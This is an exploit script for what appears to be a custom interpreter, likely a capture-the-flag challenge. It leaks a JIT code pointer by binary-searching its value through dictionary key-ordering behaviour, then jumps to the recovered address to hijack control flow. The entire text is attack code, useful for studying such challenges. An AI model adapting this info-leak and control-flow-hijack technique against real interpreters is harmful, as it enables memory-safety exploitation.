LOADI 0 0;                   # low  = 0
LOADI 1 1152921504606846975; # high = 0x0fffffffffffffff
LOADI 2 0;                   # foundkey = false
LOADI 3 1;                   # true

DICTINIT 100;

# leak pointer
LEAKJIT 101;

IFEQ 2 3
    # we reached this code by leaking the pointer and jumping to it
    LOADS 2 "----------------------------------";
    PRINT 2;
    LOADS 2 "Leaked Pointer";
    PRINT 2;
    LOADS 2 "----------------------------------";
    PRINT 2;
    PRINT 4;
ELSE
    # begin leaking process
    LOADS 2 "----------------------------------";
    PRINT 2;
    LOADS 2 "Leak Guesses";
    PRINT 2;
    LOADS 2 "----------------------------------";
    PRINT 2;
    LOADI 2 0;

    # 1. insert address to be leaked into dict
    SETDICT 101 101 100;

    # 2. while (low < high && !foundkey)
    WHILELT 0 1

        IFEQ 2 3        # if (foundkey == true)
            MOVE 0 1;   # break
        ELSE

            # guess = (low + high) / 2
            ADD 4 0 1;
            LOADI 5 2;
            DIV 4 4 5;
            PRINT 4;

            # insert guess
            SETDICT 4 4 100;

            # iterate through keys
            LOADI 10 0;        # found_ptr = 0
            LOADI 11 0;        # guess too high
            FORKEY 100 5
                # if (value == guess)
                IFEQ 5 4
                    # if already found_ptr, then guess > ptr
                    IFEQ 10 3
                        LOADI 11 1;
                    ENDIF
                ELSE
                    # if (value == pointer)
                    IFEQ 5 101
                        LOADI 10 1;
                    ENDIF
                ENDIF
            ENDFORKEY

            # generate next guess
            IFEQ 11 3
                # ptr < guess; we guessed too high
                # high = guess
                MOVE 1 4;
            ELSE
                IFEQ 10 3
                    # ptr > guess
                    # low = guess
                    MOVE 0 4;
                ELSE
                    # ptr == guess! found it!
                    MOVE 2 3;
                ENDIF
            ENDIF
        ENDIF
    ENDWHILE

    # Verify address by jumping to it
    JUMP 4;
ENDIF
